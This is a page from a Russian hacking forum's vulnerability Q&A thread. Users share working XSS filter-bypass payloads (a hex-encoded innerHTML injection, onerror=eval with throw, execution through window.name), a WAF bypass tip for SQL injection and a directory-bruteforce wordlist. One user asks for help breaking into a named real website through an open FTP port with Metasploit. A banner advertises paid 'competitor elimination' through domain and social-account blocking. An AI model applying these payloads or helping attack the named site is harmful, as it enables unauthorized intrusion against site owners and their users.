Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 268 из 296

268

Опции темы

Поиск в этой теме

Опции просмотра

04.09.2019, 21:36

Baskin-Robbins

Участник форума

Регистрация: 15.09.2018

Сообщений: 236

С нами: 4033046

Репутация: 212

Цитата:

Сообщение от Octavian

↑
А чем можно заменить （）в
＜script＞alert(1)＜/script＞

пробуй alert`aaa`

вот тебе пример /threads/424991/page-17

но если отработает такая штука, то алерт не нужен

𝕏 Twitter Reddit Telegram Копировать ссылку

04.09.2019, 21:48

Octavian

Постоянный

Регистрация: 08.07.2015

Сообщений: 501

С нами: 5710646

Репутация: 24

Цитата:

Сообщение от Baskin-Robbins

↑
пробуй alert`aaa`
вот тебе пример
/threads/424991/page-17
но если отработает такая штука, то алерт не нужен

Не выходя из ＜script＞нужно выполнить xss без ;()

06.09.2019, 14:54

karkajoi

Постоянный

Регистрация: 26.10.2016

Сообщений: 438

С нами: 5025206

Репутация: 5

Цитата:

Сообщение от man474019

↑
hi
sqli very hard WAF
can u help ?
link:
link

Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails.

06.09.2019, 15:51

crlf

Постоянный

Регистрация: 18.03.2016

Сообщений: 663

С нами: 5344886

Репутация: 441

Цитата:

Сообщение от Octavian

↑
Не выходя из ＜script＞нужно выполнить xss без ;()

Код:

document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//

06.09.2019, 16:45

Bo0oM

Новичок

Регистрация: 26.12.2009

Сообщений: 4

С нами: 8619130

Репутация: 5

Цитата:

Сообщение от crlf

↑

Код:

document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//

Код:

onerror=eval;throw'=alert\x281\x29'

Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна)

Код:

onerror=eval;throw window.name

08.09.2019, 23:28

Octavian

Постоянный

Регистрация: 08.07.2015

Сообщений: 501

С нами: 5710646

Репутация: 24

Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их

08.09.2019, 23:49

Baskin-Robbins

Участник форума

Регистрация: 15.09.2018

Сообщений: 236

С нами: 4033046

Репутация: 212

Цитата:

Сообщение от Octavian

↑
Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их

миллиона тебе достаточно? много не всегда есть хорошо

Код:

https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt

11.09.2019, 17:26

November15

Новичок

Регистрация: 11.09.2019

Сообщений: 4

С нами: 3513206

Репутация: 0

http://e-learn.i5t.ru/ можно ли ,что-либо сделать?

11.09.2019, 19:38

fandor9

Постоянный

Регистрация: 16.11.2018

Сообщений: 620

С нами: 3943766

Репутация: 47

Цитата:

Сообщение от November15

↑
http://e-learn.i5t.ru/
можно ли ,что-либо сделать?

учиться можно, вот https://e-learn.i5t.ru/enrol/index.php?id=2 ))

#10

11.09.2019, 20:32

November15

Новичок

Регистрация: 11.09.2019

Сообщений: 4

С нами: 3513206

Репутация: 0

Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)

Цитата:

Сообщение от fandor9

↑
учиться можно, вот
https://e-learn.i5t.ru/enrol/index.php?id=2
))